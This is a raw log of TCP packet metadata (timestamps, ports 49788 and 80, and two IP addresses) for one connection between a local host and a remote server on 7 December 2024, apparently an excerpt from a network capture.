Dec 7, 2024 12:59:50.720952988 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.721332073 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.721375942 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.721843004 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.721884966 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.722218990 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.722259998 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.722342968 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.722383976 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.723032951 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.723078966 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.723270893 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.723320007 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.723887920 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.723932028 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.723994970 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.724035978 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.724615097 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.724658966 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.724737883 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.724781036 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.725425005 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.725469112 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.725568056 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.725608110 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.726288080 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.726347923 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.726507902 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.726551056 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.727041006 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.727085114 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.727344036 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.727389097 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.727982044 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.728024960 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.728178978 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.728221893 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.728751898 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.728796005 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.728876114 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.728919029 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.729523897 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.729569912 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.729816914 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.729861975 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.730370045 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.730417013 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.730549097 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.730591059 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.731189966 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.731234074 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.731389999 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.731434107 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.732018948 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.732064962 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.732234955 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.732276917 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.732954979 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.733000040 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.733122110 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.733165979 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.733638048 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.733685017 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.733874083 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.733920097 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.734450102 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.734492064 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.734747887 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.734791040 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.735270023 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.735322952 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.747755051 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.747837067 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.748016119 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.748061895 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.748225927 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.748265982 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.748699903 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.748775005 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.749002934 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.749052048 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.749283075 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.749329090 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.749778986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.749825001 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.750164986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.750210047 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.750550032 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.750596046 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.750915051 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.750961065 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.751291037 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.751331091 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.751576900 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.751621008 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.752351999 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.752396107 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.752542973 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.752587080 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.753346920 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.753411055 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.753518105 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.753566027 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.754065990 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.754108906 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.754332066 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.754376888 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.754954100 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.754996061 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.755234957 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.755281925 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.755762100 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.755806923 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.755904913 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.755950928 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.756620884 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.756664991 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.756769896 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.756810904 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.757324934 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.757369995 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.757567883 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.757611990 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.758342028 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.758404970 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.758528948 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.758574009 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.759028912 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.759076118 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.759147882 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.759192944 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.759548903 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.759592056 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.759752035 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.759799004 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.760168076 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.760212898 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.760351896 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.760396004 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.761003971 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.761046886 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.761188984 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.761230946 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.761837006 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.761883974 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.761996984 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.762039900 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.762619019 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.762665987 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.762871027 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.762913942 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.763458967 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.763503075 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.763648033 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.763691902 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.764373064 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.764415979 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.764568090 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.764611959 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.765156031 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.765199900 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.765288115 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.765335083 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.765899897 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.765944004 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.766098976 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.766143084 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.766746998 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.766788960 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.767044067 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.767086983 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.767683983 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.767726898 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.767884970 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.767927885 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.768476963 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.768541098 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.768673897 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.768714905 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.769315958 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.769365072 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.769584894 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.769633055 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.770229101 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.770276070 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.770386934 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.770431042 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.770940065 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.770998001 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.771260977 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.771306038 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.909112930 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.909277916 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.909301996 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.909317017 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.909430027 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.909475088 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.909703970 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.909746885 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.910140991 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.910181999 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.910435915 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.910475969 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.910954952 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.911010981 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.911184072 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.911225080 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.911804914 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.911850929 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.911964893 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.912008047 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.912585020 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.912626982 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.912832022 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.912878036 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.913469076 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.913513899 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.913669109 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.913713932 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.914293051 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.914340019 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.914529085 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.914572954 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.915122986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.915169001 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.915239096 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.915283918 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.916013002 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.916058064 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.916138887 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.916194916 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.916703939 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.916747093 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.916933060 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.916975021 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.917534113 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.917577982 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.917807102 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.917850971 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.918339014 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.918384075 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.918574095 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.918617964 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.919162035 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.919203043 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.919356108 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.919400930 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.920176029 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.920221090 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.920371056 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.920413971 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.921000957 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.921041965 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.924055099 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.924071074 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.924081087 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.924091101 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.924102068 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.924105883 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.924113035 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.924125910 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.924134016 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.924153090 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.924164057 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.924264908 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.924303055 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.924329996 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.924362898 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.925036907 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.925080061 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.925242901 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.925283909 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.925829887 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.925870895 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.925986052 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.926033020 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.926919937 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.926968098 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.927098989 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.927144051 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.927606106 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.927671909 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.927905083 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.927956104 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.939544916 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.939584970 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.939693928 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.939738989 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.940079927 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.940126896 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.940448999 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.940496922 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.940838099 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.940882921 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.941174984 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.941222906 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.941584110 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.941646099 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.941910028 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.941957951 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.942410946 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.942460060 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.942647934 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.942699909 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.943212986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.943259954 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.943406105 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.943453074 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.944048882 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.944101095 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.944271088 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.944319010 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.944854021 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.944906950 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.945055962 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.945101023 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.945691109 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.945736885 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.945899963 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.945944071 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.946515083 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.946558952 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.946702003 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.946747065 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.947340965 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.947391033 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.947520971 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.947570086 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.948189020 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.948234081 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.948425055 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.948471069 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.949037075 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.949084044 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.949193954 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.949239016 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.949830055 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.949878931 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.950090885 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.950149059 CET	49788	80	192.168.2.7	185.215.113.206
